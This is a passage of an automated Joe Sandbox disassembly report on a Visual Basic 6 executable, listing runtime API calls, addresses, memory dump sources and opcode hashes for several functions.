                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00422E22
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00422E29
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422E50
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00422E76
                                                                                    • __vbaStrMove.MSVBVM60(00000004), ref: 00422E97
                                                                                    • #618.MSVBVM60(00000000), ref: 00422E9E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422EA9
                                                                                    • __vbaI4Str.MSVBVM60(00000000), ref: 00422EB0
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422EC7
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422EDA
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00422EE1
                                                                                    • __vbaFreeStr.MSVBVM60(00422F2A), ref: 00422F1A
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422F23
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00422F40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 277344030-0
                                                                                    • Opcode ID: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
                                                                                    • Instruction ID: 0dbf9007f3e025cc507390632291acf7cd708b816fac69f1e160cd6eff4667e3
                                                                                    • Opcode Fuzzy Hash: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
                                                                                    • Instruction Fuzzy Hash: 8091C871D00248EFDB04DFA0DA48BDEBBB8FB48705F108169E612B76A0DB745A49CF64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040D650 Relevance: 61.5, APIs: 31, Strings: 4, Instructions: 283COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 0040D69B
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D6B2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D6D3
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D6FA
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D724
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D749
                                                                                    • __vbaLateIdCallLd.MSVBVM60(?,?,68030000,00000000), ref: 0040D75E
                                                                                    • __vbaI4Var.MSVBVM60(00000000), ref: 0040D768
                                                                                    • __vbaLateMemCallLd.MSVBVM60(?,?,hwnd,00000000,00008003), ref: 0040D78A
                                                                                    • __vbaVarTstEq.MSVBVM60(00000000), ref: 0040D794
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D7A2
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040D7B2
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D7DF
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D7EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$CallCheckExitHresultLateListProc$Error
                                                                                    • String ID: MR$ RO$Once$hwnd
                                                                                    • API String ID: 1721777011-1584818490
                                                                                    • Opcode ID: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
                                                                                    • Instruction ID: 3a18aed98be3068f103a5839567168951ce735157339c65100099b40d738d62c
                                                                                    • Opcode Fuzzy Hash: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
                                                                                    • Instruction Fuzzy Hash: 24B10771900204EBDB04DFE4DD49BAEBBB8FF48700F50816AE505B72A1DB785945CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041F2C0 Relevance: 57.9, APIs: 31, Strings: 2, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0041F2DE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F30E
                                                                                    • #717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F33D
                                                                                    • __vbaStrVarMove.MSVBVM60(?), ref: 0041F347
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F352
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F35B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041F38A
                                                                                    • #717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F3B9
                                                                                    • __vbaStrVarMove.MSVBVM60(?), ref: 0041F3C3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F3CE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041F3D9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F3E2
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F3EB
                                                                                    • __vbaStrCat.MSVBVM60(00000000,Remark for ), ref: 0041F411
                                                                                    • #717.MSVBVM60(?,00000008,00000040,00000000), ref: 0041F430
                                                                                    • __vbaStrVarMove.MSVBVM60(?), ref: 0041F43D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F448
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041F453
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F45C
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041F46F
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041F4CF
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F4DD
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F4EB
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F4F4
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00406F68,?,?,?), ref: 0041F515
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000002,00000000), ref: 0041F525
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00406F68,?,?), ref: 0041F53B
                                                                                    • __vbaRecDestructAnsi.MSVBVM60(00406F68,?), ref: 0041F54D
                                                                                    • __vbaRecDestructAnsi.MSVBVM60(00406F68,?,0041F5A5), ref: 0041F586
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F58F
                                                                                    • __vbaRecDestruct.MSVBVM60(00406F68,?), ref: 0041F59E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Ansi$#717CopyDestructError$System$ChkstkListUnicode
                                                                                    • String ID: P$Remark for
                                                                                    • API String ID: 3958374764-404550290
                                                                                    • Opcode ID: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
                                                                                    • Instruction ID: 57f6e2307a2881c8932ec88b1fdace90c080974f77e0174b8cc4dbb87e3633e4
                                                                                    • Opcode Fuzzy Hash: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
                                                                                    • Instruction Fuzzy Hash: 2081FAB1900249EFDB14DFA0DE49BDEBBB8FB48305F108169E506BB2A0DB745A49CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00411210 Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 255COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0041127A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                    • __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                    • #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                    • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                    • #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                    • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 004113D6
                                                                                    • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 00411464
                                                                                    • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0041147C
                                                                                    • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 00411483
                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 004114A0
                                                                                    • #537.MSVBVM60(?,?), ref: 004114B4
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 004114C5
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 004114C8
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 004114D3
                                                                                    • #537.MSVBVM60(?,00000000,?,?), ref: 004114D7
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114E2
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 004114EB
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114F2
                                                                                    • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 004114F6
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 00411501
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 00411504
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0041150B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 00411523
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041154C
                                                                                    • __vbaFreeStr.MSVBVM60(004115AE), ref: 004115A7
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 004115C9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                    • String ID: gfff$gfff
                                                                                    • API String ID: 2397813863-3084402119
                                                                                    • Opcode ID: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
                                                                                    • Instruction ID: 89f21965ee05a7b64c3006bf8dd978c4399402eb5f0bddd0a045db34c415a49c
                                                                                    • Opcode Fuzzy Hash: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
                                                                                    • Instruction Fuzzy Hash: 9B9162B1E00249AFCB08DFA4DD45BDDBBFAEB88301F10412AE50AE7264EB345985CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A5A0 Relevance: 52.7, APIs: 35, Instructions: 220COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040C87B,00000000), ref: 0041A5BE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041A5EE
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,00000000,Function_000032B6), ref: 0041A5FF
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A60E
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A62A
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041A664
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041A67A
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041A693
                                                                                    • #525.MSVBVM60(00000104), ref: 0041A6BC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041A6C7
                                                                                    • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041A6FE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041A73D
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0041A758
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041A77E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041A78F
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7A4
                                                                                    • #616.MSVBVM60(?,?,?,00000000), ref: 0041A7B9
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A7C7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041A7DE
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7EA
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 0041A7FB
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,?,00000001,?,00000000), ref: 0041A822
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A830
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000000), ref: 0041A83C
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A84A
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 0041A853
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041A879
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128,?,00000000), ref: 0041A8BA
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 0041A8D0
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?,?,00000000), ref: 0041A8E9
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041A90D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A96B), ref: 0041A937
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041A94F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041A958
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041A964
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeSystem$AnsiMove$#525#616BoundsBstrChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1820427907-0
                                                                                    • Opcode ID: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
                                                                                    • Instruction ID: da6c7bdc064fde5d6e21051214ad5d77861f7fd9d568965cd9a71694eebb6c89
                                                                                    • Opcode Fuzzy Hash: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
                                                                                    • Instruction Fuzzy Hash: B5A11975901259DBDB14EFA0DE4DBDEB7B4FB48304F1081A9E10AB72A0DB745A84CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004193C0 Relevance: 51.3, APIs: 34, Instructions: 299COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004193DE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041940E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00419428
                                                                                    • __vbaRedim.MSVBVM60(00000000,0000004C,?,00000000,00000001,?,00000000), ref: 00419458
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 0041947D
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 00419495
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004194C9
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004194DA
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 004194FA
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 00419504
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 00419519
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041954D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041955E
                                                                                    • __vbaAryLock.MSVBVM60(00000000,?), ref: 0041956F
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004195A3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004195B7
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 004195E6
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 004195F0
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 004195FA
                                                                                    • __vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Lock$SystemUnlock$DestructRedim$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 3555954879-0
                                                                                    • Opcode ID: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
                                                                                    • Instruction ID: 67aec0367089ad9bdb06f85a3682bb1edb9e8b84c894a553a99a1ed1c2ada365
                                                                                    • Opcode Fuzzy Hash: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
                                                                                    • Instruction Fuzzy Hash: BED1E470D00208EFDB18DFA4DA98BDDBBB5BF48300F10815AE516B72A1DB74A985CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00420F80 Relevance: 49.7, APIs: 33, Instructions: 230COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 00420FA3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 00420FC5
                                                                                    • __vbaI2I4.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 00420FD2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00420FE6
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00420FED
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421029
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421044
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421056
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421071
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004210A0
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004210C6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042113B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421149
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421160
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042116A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421181
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042118B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211A2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211B5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211CE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211E2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211F5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421209
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421223
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421237
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421250
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421269
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421281
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042129F
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004212B2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004212C6
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004212CD
                                                                                    • __vbaErrorOverflow.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 004212E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Overflow
                                                                                    • String ID:
                                                                                    • API String ID: 2760075901-0
                                                                                    • Opcode ID: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
                                                                                    • Instruction ID: 6f7972a480d0dd1fda114303b5166632bd8b31c6f1599b60b9e65e0100795082
                                                                                    • Opcode Fuzzy Hash: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
                                                                                    • Instruction Fuzzy Hash: 0F81D835B00361C6C724AB98E9C65ADB3A3BFA9701FC10076D580A7271CF7998C1C7AE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00420C20 Relevance: 49.7, APIs: 33, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(660E6C30), ref: 00420C36
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(660E6C30), ref: 00420C51
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420C6B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420C84
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420C9B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420CB9
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420CD3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420CEF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D0A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D24
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00420D2E
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D42
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D60
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00420D6A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D7E
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D95
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D9F
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DB6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DC9
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DE6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DF0
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E07
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E1B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E32
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E3F
